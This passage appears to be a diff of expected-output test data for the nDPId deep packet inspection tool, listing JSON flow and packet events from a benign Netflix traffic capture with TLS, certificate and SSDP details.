{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033206,"flow_last_seen":1484319033206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033206,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1484319033206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033206,"pkt":"gCqoTGHM5JjWH70UCABFAABAagpAAEAGFrrAqAEHNCDEJM99AbszkZRgAAAAALAC\/\/8LKQAAAgQFtAEDAwUBAQgKH2S5UQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1484319033258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033258,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z33SmoRGM5GUYaASReoDCgAAAgQFtAQCCAq2m8WoH2S5UQEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1484319033259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033259,"pkt":"gCqoTGHM5JjWH70UCABFAAA0m4FAAEAG5U7AqAEHNCDEJM99AbszkZRh0pqER4AQEBVneAAAAQEICh9kuYW2m8Wo"} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033631,"flow_last_seen":1484319033631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033631,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1484319033631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033631,"pkt":"gCqoTGHM5JjWH70UCABFAABAVMpAAEAGIQjAqAEHNkXM8c9+AbvPvqpAAAAAALAC\/\/9MiwAAAgQFtAEDAwUBAQgKH2S67gAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1484319033678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033678,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGi7Y2RczxwKgBBwG7z36\/HDHnz76qQaASRepQUQAAAgQFtAQCCAqFp1CVH2S67gEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1484319033680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033680,"pkt":"gCqoTGHM5JjWH70UCABFAAA0\/p1AAEAGd0DAqAEHNkXM8c9+AbvPvqpBvxwx6IAQEBW0wwAAAQEICh9kux6Fp1CV"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01369{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1484319033886,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"thread_ts_msec":1484319033886,"pkt":"AQBef\/\/65JjWH70UCABFAACWfwIAAAERiKvAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033943,"flow_last_seen":1484319033943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033943,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1484319033943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033943,"pkt":"gCqoTGHM5JjWH70UCABFAABAxzpAAEAGrpfAqAEHNkXM8c9\/Abtb3TwWAAAAALAC\/\/8tbQAAAgQFtAEDAwUBAQgKH2S8FwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1484319033988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033988,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z39IJeEpW908F6ASRer4mgAAAgQFtAQCCAqFp1DiH2S8FwEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1484319033990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033990,"pkt":"gCqoTGHM5JjWH70UCABFAAA0N8lAAEAGPhXAqAEHNkXM8c9\/Abtb3TwXSCXhKoAQEBVdDAAAAQEICh9kvEiFp1Di"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033943,"flow_last_seen":1484319033943,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033943,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1484319033943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033943,"pkt":"gCqoTGHM5JjWH70UCABFAABAxzpAAEAGrpfAqAEHNkXM8c9\/Abtb3TwWAAAAALAC\/\/8tbQAAAgQFtAEDAwUBAQgKH2S8FwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1484319033988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033988,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z39IJeEpW908F6ASRer4mgAAAgQFtAQCCAqFp1DiH2S8FwEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1484319033990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033990,"pkt":"gCqoTGHM5JjWH70UCABFAAA0N8lAAEAGPhXAqAEHNkXM8c9\/Abtb3TwXSCXhKoAQEBVdDAAAAQEICh9kvEiFp1Di"} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1484319033993,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1484319033993,"pkt":"AQBef\/\/65JjWH70UCABFAACZ8KEAAAERFwnAqAEH7\/\/\/+tIQB2wAhUYzTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 